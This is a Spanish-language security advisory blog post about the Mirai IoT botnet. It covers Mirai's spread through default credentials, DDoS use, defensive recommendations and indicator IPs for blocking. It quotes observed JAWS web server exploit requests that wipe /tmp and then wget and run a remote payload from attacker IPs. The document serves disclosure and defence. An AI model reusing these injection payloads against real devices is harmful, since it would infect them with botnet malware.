Mirai Botnet, quƩ es y porquƩ debes tener cuidado
- Cyberpeace Tech
- 6 sept 2023
- 3 Min. de lectura
Actualizado: 28 sept 2023
ļ»æEl siguiente informe tiene como objetivo la notificaciĆ³n de actividad relacionada a la Botnet āMirai Botnetā la cual presenta actividad en mĆŗltiples servicios de internet, atacando principalmente servidores expuestos por el protocolo HTTP.
Mirai es una Botnet que infecta dispositivos inteligentes que funcionan con procesadores ARC, convirtiĆ©ndolos en una red de bots que pueden ser controlados remotamente para lanzar ataques distribuidos de denegaciĆ³n de servicio (DDoS), Mirai escanea las direcciones IP para identificar los dispositivos inteligentes que ejecutan una versiĆ³n de Linux conocida como ARC.
En septiembre de 2016, los creadores del Malware Mirai lanzaron un ataque DDoS contra el sitio web de un conocido experto en seguridad. Una semana mĆ”s tarde sacaron a la luz el cĆ³digo fuente, posiblemente para intentar ocultar los orĆgenes de ese ataque.
Una vez liberada, Mirai se convirtiĆ³ en una bola de nieve fuera de control, ya que fue replicada y modificada por otros ciberdelincuentes.
El cĆ³digo fuente de la botnet Mirai, publicado en la dark web, sigue evolucionando debido a que los creadores de Malware lo adaptan para crear variantes mĆ”s avanzadas de Mirai.
Las amenazas recientes de botnets de IoT, como Okiru, Satori y Reaper, se basan en el cĆ³digo fuente del Malware de Mirai.
El Malware Mirai escanea las direcciones IP para identificar los dispositivos inteligentes que ejecutan una versiĆ³n de Linux conocida como ARC. Asimismo, aprovecha las vulnerabilidades de seguridad del dispositivo IoT para obtener acceso a la red a travĆ©s de combinaciones predeterminadas de nombre de usuario y contraseƱa. Si estas configuraciones no se han cambiado o actualizado, Mirai puede iniciar sesiĆ³n en el dispositivo e infectarlo con Malware.
A medida que aumenta el nĆŗmero de dispositivos atrapados en la red infectada, los ciberdelincuentes que la controlan utilizan las redes de bots Mirai para colapsar los sitios web o servidores objetivo bombardeĆ”ndolos con mĆ”s trĆ”fico del que pueden soportar.
Mirai ha sido detectado por Cyberpeace realizando actividades maliciosas en la madrugada del 31 de agosto, y fue detectado por nuestras herramientas y equipo de trabajo, realizando posteriormente una investigaciĆ³n, relacionado a una vulnerabilidad de JAWS la cual si es explotada podrĆa conducir a una ejecuciĆ³n de cĆ³digo remoto la cual se ha visualizado en peticiones HTTP solicitando recursos hacĆa direcciones IP maliciosas.
127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+94.158.247[.]123/jaws;sh+/tmp/jaws 127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+121.62.21[.]23/jaws;sh+/tmp/jaws
127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+ 81.161.229[.]185/jaws;sh+/tmp/jaws
127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251[.]176/jaws;sh+/tmp/jaws
El comando se ejecuta en la misma maquina intentando cambiar el directorio actual a ā/tmpā para despuĆ©s forzar para que sean borrados el contenido del directorio actual (ā/tmpā) siguiendo con el anĆ”lisis - **wget+94.158.247[.]123/jaws**; se utiliza para descargar archivos desde internet, realizando la solicitud HTTP a JAWS Remote Code Execution Exploit - HTTP, se trata de una ejecuciĆ³n remota de comandos en JAWS/1.0 web server desde la direcciĆ³n ipv4 94.158.247.123 o como se ve relacionado con los comandos anteriores.
Las direcciones ip relacionadas son las siguientes:
222.222.180[.]202
94.158.247[.]123
145.253.127[.]199
81.161.229[.]185
116.33.128[.]116
121.62.21[.]23
178.175.161[.]103
113.65.131[.]103
212.8.251[.]176
223.13.125[.]214
Las cuales son IPs, que se recomienda agregar a dispositivos perimetrales para protecciĆ³n de la red administrada. Si encuentras este tipo de comandos en tu sistema, es importante tomar medidas de seguridad inmediatas, como aislar los equipos infectados de la infraestructura, escanear en busca de Malware, cambiar contraseƱas y realizar un anĆ”lisis exhaustivo en el servidor.
Recomendaciones sobre Mirai Botnet
Cambia contraseƱas por defecto: Cambia las contraseƱas predeterminadas de tus dispositivos dentro de la infraestructura, incluidos enrutadores, cƔmaras IP, impresoras, servidores, servidores con portales expuestos a internet, etc.
Actualiza regularmente: MantĆ©n tus dispositivos actualizados con los Ćŗltimos parches y firmware. Los fabricantes a menudo lanzan actualizaciones de seguridad para corregir vulnerabilidades conocidas.
Desactiva servicios innecesarios: Si un dispositivo tiene servicios o caracterĆsticas que no necesitas, desactĆvalos. Esto reduce la superficie de ataque y disminuye las posibilidades de explotaciĆ³n.
SegmentaciĆ³n de red: Separa tus dispositivos en una red separada (VLAN) de tus dispositivos crĆticos. Esto limita la propagaciĆ³n de posibles infecciones y aĆsla los dispositivos comprometidos.
Firewall y filtrado de trƔfico: Configura firewalls en tus dispositivos y redes para filtrar el trƔfico no deseado y bloquear conexiones sospechosas.
MonitorizaciĆ³n de trĆ”fico: Utiliza herramientas de monitorizaciĆ³n de red para detectar actividades anormales, como patrones de trĆ”fico inusuales que podrĆan indicar un posible ataque.
Desactiva UPnP: Universal Plug and Play (UPnP) puede abrir puertas traseras no deseadas en dispositivos. Desactiva esta funciĆ³n a menos que sea absolutamente necesaria.
Apaga dispositivos no utilizados: Si no necesitas un dispositivo IoT en un momento determinado, apĆ”galo. Esto reduce el tiempo de exposiciĆ³n a posibles amenazas.
EducaciĆ³n y concienciaciĆ³n: Educa a los usuarios sobre las mejores prĆ”cticas de seguridad cibernĆ©tica para dispositivos y la importancia de mantenerse alerta frente a amenazas potenciales.
Colocar los indicadores de compromiso adjuntados en el archivo IOCās.xlsx y en las herramientas de seguridad perimetral.